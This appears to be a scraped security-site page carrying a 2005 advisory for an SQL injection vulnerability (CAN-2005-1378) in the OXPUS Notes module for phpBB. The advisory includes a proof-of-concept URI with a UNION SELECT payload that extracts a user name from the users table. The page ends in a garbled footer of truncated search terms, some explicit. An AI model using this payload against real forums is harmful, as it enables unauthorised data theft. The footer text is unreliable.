about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Notes Module for PHPBB SQL Injection Vulnerability


Title Notes Module for PHPBB SQL Injection Vulnerability
Published 2005-04-28-12:00AM
Updated 2005-05-10-03:03PM
Class Input Validation Error
CVE   CAN-2005-1378
Remote  Yes
Local  No
Credit  James Bercegay of the GulfTech Security Research Team is credited with the discovery of this vulnerability.
Vulnerable  OXPUS.de Notes mod
Not Vulnerable  OXPUS.de Notes mod 1.4.7
Code   No exploit is required.

The following proof of concept URI is available:
http://www.example.com/posting_notes.php?mode=editpost&p=-99%20UNION%20SELECT%200,0,username,0,0,0,0,0,0%20FROM%20orionphpbb_users%20WHERE%20user_id=2/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 22:15:19 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Viedio sex php 4.3.11 Security v 2...n.com/ Free 3pic. pic sexsy CMS is Fre video sexy www 89-com aflam sxs xxx sexy 2...n.com/ masag noheliavid WWW.PORNO. Sendmail8. 2...n.com/ Crack Data remotesoft Entertainm expl and u 200 /compo Jorje www.sexpho aflam sxs lo286l aflam sxs 2...n.com/ 2...n.com/ ccv NAYANATARA Www.sexwor free downl Mambo LaiT sexymore.n www.taotao xxxsexyvid 200 /compo 2...n.com/ Crack Data IIS5.0 Www.sakela VIDEO SEX joomla//ad blog.qiouy news for c SEXXL.html 2...n.com/ ww.lmdby.c search/exp